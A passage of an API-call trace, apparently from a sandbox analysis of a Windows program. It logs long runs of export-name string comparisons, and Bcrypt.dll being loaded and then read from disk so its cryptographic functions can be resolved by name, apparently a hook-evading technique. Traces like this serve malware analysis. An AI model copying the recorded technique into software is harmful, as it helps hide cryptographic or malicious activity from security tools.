(lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLW") returned 1 [0155.353] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0155.353] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0155.353] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0155.353] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0155.353] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0155.353] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0155.353] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 1 [0155.353] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="DAD_AutoScroll") returned 1 [0155.353] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="DAD_DragEnterEx") returned 0 [0155.353] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AppCompat_RunDLLW") returned 1 [0155.354] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AssocCreateForClasses") returned 1 [0155.354] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AssocGetDetailsOfPropKey") returned 1 [0155.354] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CDefFolderMenu_Create2") returned 1 [0155.354] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CIDLData_CreateFromIDArray") returned 1 [0155.354] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0155.354] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CheckEscapesW") returned 1 [0155.354] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CommandLineToArgvW") returned 1 [0155.354] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLL") returned 1 [0155.354] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLA") returned 1 [0155.354] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLAsUserW") returned 1 [0155.354] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLW") returned 1 [0155.354] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0155.354] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0155.354] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0155.354] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0155.354] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0155.354] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0155.476] GetProcessHeap () returned 0x4d0000 [0155.476] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x400d040 | out: hHeap=0x4d0000) returned 1 [0155.895] GetProcessHeap () returned 0x4d0000 [0155.895] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x10) returned 0x4e9050 [0155.895] LoadLibraryA (lpLibFileName="Bcrypt.dll") returned 0x7ffc5bcc0000 [0155.900] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0155.900] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0155.901] GetModuleFileNameA (in: hModule=0x7ffc5bcc0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")) returned 0x1e [0155.901] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0155.901] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0155.901] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0155.901] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=159648) returned 1 [0155.901] GetProcessHeap () returned 0x4d0000 [0155.901] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x26fa0) returned 0x2c42010 [0155.904] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0155.904] ReadFile (in: hFile=0x15c, lpBuffer=0x2c42010, nNumberOfBytesToRead=0x26fa0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2c42010*, lpNumberOfBytesRead=0x14f5a4*=0x26fa0, lpOverlapped=0x0) returned 1 [0155.908] CloseHandle (hObject=0x15c) returned 1 [0155.908] lstrcmpA (lpString1="BCryptAddContextFunction", lpString2="BCryptAddContextFunction") returned 0 [0155.909] lstrcmpA (lpString1="BCryptAddContextFunctionProvider", lpString2="BCryptAddContextFunction") returned 1 [0155.909] lstrcmpA (lpString1="BCryptAddContextFunctionProvider", lpString2="BCryptAddContextFunctionProvider") returned 0 [0155.909] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptAddContextFunction") returned 1 [0155.909] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptAddContextFunctionProvider") returned 1 [0155.909] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptCloseAlgorithmProvider") returned 0 [0155.909] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptAddContextFunction") returned 1 [0155.909] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0155.909] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0155.909] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptConfigureContext") returned 0 [0155.909] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptAddContextFunction") returned 1 [0155.909] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptAddContextFunctionProvider") returned 1 [0155.909] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0155.909] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptConfigureContext") returned 1 [0155.909] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptConfigureContextFunction") returned 0 [0155.909] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptAddContextFunction") returned 1 [0155.909] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0155.909] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0155.909] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptConfigureContext") returned 1 [0155.909] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptConfigureContextFunction") returned 1 [0155.909] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptCreateContext") returned 0 [0155.909] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptAddContextFunction") returned 1 [0155.909] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0155.909] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0155.909] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptConfigureContext") returned 1 [0155.910] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptConfigureContextFunction") returned 1 [0155.910] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCreateContext") returned 1 [0155.910] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCreateHash") returned 0 [0155.910] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptAddContextFunction") returned 1 [0155.910] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0155.910] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0155.910] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptConfigureContext") returned 1 [0155.910] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptConfigureContextFunction") returned 1 [0155.910] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateContext") returned 1 [0155.910] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateHash") returned 1 [0155.910] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateMultiHash") returned 0 [0155.910] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptAddContextFunction") returned 1 [0155.910] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptAddContextFunctionProvider") returned 1 [0155.910] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0155.910] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptConfigureContext") returned 1 [0155.910] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptConfigureContextFunction") returned 1 [0155.910] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateContext") returned 1 [0155.910] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateHash") returned 1 [0155.910] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateMultiHash") returned 1 [0155.910] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptDecrypt") returned 0 [0155.910] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptAddContextFunction") returned 1 [0155.910] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0155.910] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0155.910] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptConfigureContext") returned 1 [0155.910] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptConfigureContextFunction") returned 1 [0155.911] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateContext") returned 1 [0155.911] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateHash") returned 1 [0155.911] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateMultiHash") returned 1 [0155.911] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptDecrypt") returned 1 [0155.911] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptDeleteContext") returned 0 [0155.911] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptAddContextFunction") returned 1 [0155.911] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0155.911] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0155.911] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptConfigureContext") returned 1 [0155.911] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptConfigureContextFunction") returned 1 [0155.911] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateContext") returned 1 [0155.911] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateHash") returned 1 [0155.911] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateMultiHash") returned 1 [0155.911] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDecrypt") returned 1 [0155.911] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDeleteContext") returned 1 [0155.911] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDeriveKey") returned 0 [0155.911] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptAddContextFunction") returned 1 [0155.911] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptAddContextFunctionProvider") returned 1 [0155.911] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0155.911] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptConfigureContext") returned 1 [0155.911] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptConfigureContextFunction") returned 1 [0155.911] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateContext") returned 1 [0155.911] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateHash") returned 1 [0155.911] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateMultiHash") returned 1 [0155.911] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDecrypt") returned 1 [0155.911] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeleteContext") returned 1 [0155.912] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeriveKey") returned 1 [0155.912] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeriveKeyCapi") returned 0 [0155.912] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptAddContextFunction") returned 1 [0155.912] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptAddContextFunctionProvider") returned 1 [0155.912] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0155.912] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptConfigureContext") returned 1 [0155.912] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptConfigureContextFunction") returned 1 [0155.912] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateContext") returned 1 [0155.912] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateHash") returned 1 [0155.912] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateMultiHash") returned 1 [0155.912] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDecrypt") returned 1 [0155.912] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeleteContext") returned 1 [0155.912] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKey") returned 1 [0155.912] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKeyCapi") returned 1 [0155.912] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKeyPBKDF2") returned 0 [0155.912] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptAddContextFunction") returned 1 [0155.912] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0155.912] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0155.912] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptConfigureContext") returned 1 [0155.912] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptConfigureContextFunction") returned 1 [0155.912] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateContext") returned 1 [0155.913] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateHash") returned 1 [0155.913] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateMultiHash") returned 1 [0155.913] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDecrypt") returned 1 [0155.913] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeleteContext") returned 1 [0155.913] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKey") returned 1 [0155.913] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKeyCapi") returned 1 [0155.913] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0155.913] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDestroyHash") returned 0 [0155.913] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptAddContextFunction") returned 1 [0155.913] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0155.913] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0155.913] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptConfigureContext") returned 1 [0155.913] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptConfigureContextFunction") returned 1 [0155.913] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateContext") returned 1 [0155.913] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateHash") returned 1 [0155.913] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateMultiHash") returned 1 [0155.913] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDecrypt") returned 1 [0155.913] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeleteContext") returned 1 [0155.913] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKey") returned 1 [0155.913] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKeyCapi") returned 1 [0155.913] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0155.913] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDestroyHash") returned 1 [0155.913] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDestroyKey") returned 0 [0155.913] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptAddContextFunction") returned 1 [0155.913] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptAddContextFunctionProvider") returned 1 [0155.914] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0155.914] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptConfigureContext") returned 1 [0155.914] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptConfigureContextFunction") returned 1 [0155.914] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateContext") returned 1 [0155.914] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateHash") returned 1 [0155.914] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateMultiHash") returned 1 [0155.914] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDecrypt") returned 1 [0155.914] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeleteContext") returned 1 [0155.914] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKey") returned 1 [0155.914] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKeyCapi") returned 1 [0155.914] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0155.914] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroyHash") returned 1 [0155.914] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroyKey") returned 1 [0155.914] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroySecret") returned 0 [0155.914] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptAddContextFunction") returned 1 [0155.914] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0155.914] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0155.914] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptConfigureContext") returned 1 [0155.914] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptConfigureContextFunction") returned 1 [0155.914] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateContext") returned 1 [0155.914] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateHash") returned 1 [0155.914] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateMultiHash") returned 1 [0155.914] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDecrypt") returned 1 [0155.914] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeleteContext") returned 1 [0155.914] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKey") returned 1 [0155.914] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKeyCapi") returned 1 [0155.914] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0155.914] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroyHash") returned 1 [0155.914] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroyKey") returned 1 [0155.914] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroySecret") returned 1 [0155.914] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDuplicateHash") returned 0 [0155.914] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptAddContextFunction") returned 1 [0155.914] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0155.914] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0155.914] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptConfigureContext") returned 1 [0155.914] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptConfigureContextFunction") returned 1 [0155.914] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateContext") returned 1 [0155.915] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateHash") returned 1 [0155.915] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateMultiHash") returned 1 [0155.915] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDecrypt") returned 1 [0155.915] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeleteContext") returned 1 [0155.915] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKey") returned 1 [0155.915] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKeyCapi") returned 1 [0155.915] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0155.915] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroyHash") returned 1 [0155.915] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroyKey") returned 1 [0155.915] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroySecret") returned 1 [0155.915] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDuplicateHash") returned 1 [0155.915] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDuplicateKey") returned 0 [0155.915] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptAddContextFunction") returned 1 [0155.915] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptAddContextFunctionProvider") returned 1 [0155.915] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0155.915] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptConfigureContext") returned 1 [0155.915] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptConfigureContextFunction") returned 1 [0155.915] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateContext") returned 1 [0155.915] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateHash") returned 1 [0155.915] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateMultiHash") returned 1 [0155.915] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDecrypt") returned 1 [0155.915] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeleteContext") returned 1 [0155.915] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKey") returned 1 [0155.915] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKeyCapi") returned 1 [0155.915] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0155.915] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroyHash") returned 1 [0155.915] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroyKey") returned 1 [0155.915] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroySecret") returned 1 [0155.915] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDuplicateHash") returned 1 [0155.915] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDuplicateKey") returned 1 [0155.915] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptEncrypt") returned 0 [0155.915] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptAddContextFunction") returned 1 [0155.915] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptAddContextFunctionProvider") returned 1 [0155.915] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0155.915] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptConfigureContext") returned 1 [0155.915] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptConfigureContextFunction") returned 1 [0155.915] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateContext") returned 1 [0155.915] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateHash") returned 1 [0155.916] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateMultiHash") returned 1 [0155.916] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDecrypt") returned 1 [0155.916] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeleteContext") returned 1 [0155.916] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKey") returned 1 [0155.916] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKeyCapi") returned 1 [0155.916] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0155.916] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroyHash") returned 1 [0155.916] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroyKey") returned 1 [0155.916] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroySecret") returned 1 [0155.916] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDuplicateHash") returned 1 [0155.916] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDuplicateKey") returned 1 [0155.916] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptEncrypt") returned 1 [0155.916] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptEnumAlgorithms") returned 0 [0155.916] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptAddContextFunction") returned 1 [0155.917] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptAddContextFunctionProvider") returned 1 [0155.917] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0155.917] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptConfigureContext") returned 1 [0155.917] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptConfigureContextFunction") returned 1 [0155.917] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateContext") returned 1 [0155.917] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateHash") returned 1 [0155.917] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateMultiHash") returned 1 [0155.917] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDecrypt") returned 1 [0155.917] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeleteContext") returned 1 [0155.917] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKey") returned 1 [0155.917] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKeyCapi") returned 1 [0155.917] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0155.917] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", 